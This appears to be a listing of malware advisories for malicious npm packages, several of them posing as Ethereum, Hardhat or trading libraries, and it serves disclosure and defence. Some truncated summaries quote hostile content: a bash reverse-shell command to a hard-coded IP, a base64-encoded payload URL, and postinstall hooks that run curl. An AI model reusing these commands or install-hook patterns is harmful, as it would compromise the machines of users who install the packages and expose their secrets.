1822 matches found
Malicious code in paysafe-gbp-virtual-terminal-lib-fe (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8437cc0ad1a14bf5694e8b5fbc17a0616033c1c473c6e71f46684172bc122ab3 The package paysafe-gbp-virtual-terminal-lib-fe was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-4164 Malicious code in identitysecuretokenserv (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2704e731d0b82aa5927cf3713f741111b03fe8efb2d886cb0ef472a24705c5e3 The package identitysecuretokenserv was found to contain malicious code. Source: ossf-package-analysis...
Malicious code in ctf-flare (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 23293f1bc28e465f7ffaf916fd8a6cc3958b873a2b338b81c0bf71bb146d1d36 package.json declares a postinstall script that runs node src/install.js after building a local binary. src/install.js is a 175 KB single-line payloa...
MAL-2026-3812 Malicious code in @easytipsportal/node-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9892fc2e2c3a9d9fe3c09548d1f5f2901a296945e9bde7d9ec7876a12720b6cf The package @easytipsportal/node-helper was found to contain malicious code. Source: ghsa-malware...
Malicious code in apexpro-node (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 95c8a3b29ed31b909fa4a13a8b310c4cee8f115748f7b708aeab52ab2b66fdbb The package apexpro-node was found to contain malicious code. Source: ghsa-malware e4cc91e23bb614febd12cef6d21d4456fb9cfa198c2aa76215d1b38dd820d9b4 A...
MAL-2026-3816 Malicious code in apex-connector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 33a26a7f829a26ef83ab119b6d61de6109d553f0b34432bf1efb37d5f56f4064 The package apex-connector was found to contain malicious code. Source: ossf-package-analysis...
Malicious code in apex-connector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 33a26a7f829a26ef83ab119b6d61de6109d553f0b34432bf1efb37d5f56f4064 The package apex-connector was found to contain malicious code. Source: ossf-package-analysis...
Malicious code in apex-trading (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7cf744353f06f389c92cd15c56bf0ec7d29860e8af7c9618413cf65e455428eb The package apex-trading was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-3802 Malicious code in @datatrain/passenger-v3 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ff70d96169a200be30c83b3e37506f7abf2f377ed1d6dec8005269d98b58104 The package @datatrain/passenger-v3 was found to contain malicious code. Source: ossf-package-analysis...
Malicious code in npmjs_solc-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71 The package.json defines a postinstall lifecycle hook that invokes childprocess.exec to run curl -s...
MAL-2026-3723 Malicious code in npmjs_solc-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71 The package.json defines a postinstall lifecycle hook that invokes childprocess.exec to run curl -s...
MAL-2026-3722 Malicious code in npmjs_hardhat-common (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 687cf12a3e056374d2222b02393858ebeca4856448165be0426f8fb32d207974 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ethers-wordlist (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 94ac365a81e582fce9faa13839220134e640d8ec505179e55e7aa636a324205c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2026-3720 Malicious code in ethers-wordlist (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 94ac365a81e582fce9faa13839220134e640d8ec505179e55e7aa636a324205c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ethers-web (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7b57e9cfd1db5527382181f22fbf36f8bbc8cc0df4f701d2b4d6bc7ec7dbc407 The OpenSSF Package Analysis project identified 'ethers-web' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...
MAL-2026-3711 Malicious code in ethers-web (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7b57e9cfd1db5527382181f22fbf36f8bbc8cc0df4f701d2b4d6bc7ec7dbc407 The OpenSSF Package Analysis project identified 'ethers-web' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...
MAL-2026-3709 Malicious code in ethers-json-wallet (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis f3f9028ba781f40a017e081a311983ae2834cdce93583e629952f1f7e29a0677 The OpenSSF Package Analysis project identified 'ethers-json-wallet' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...
Malicious code in hello-world-pkg-value-value-p (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...
Malicious code in truffle-js (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 52bd5b41de871fbbc8c5895f63dfec08ba2ff6ecb9ea03fa6fdb5d9245c74616 The package.json lifecycle script invokes require'childprocess'.execSync with a curl command at install time. Running curl through childprocess durin...
MAL-2026-3713 Malicious code in hardhat-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bb86c79e7ed3cd429c0f28bc08e00ce020df2ec42fdda086ad8bfca99f259930 package.json declares a postinstall script that base64-decodes the string 'aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=' to the URL...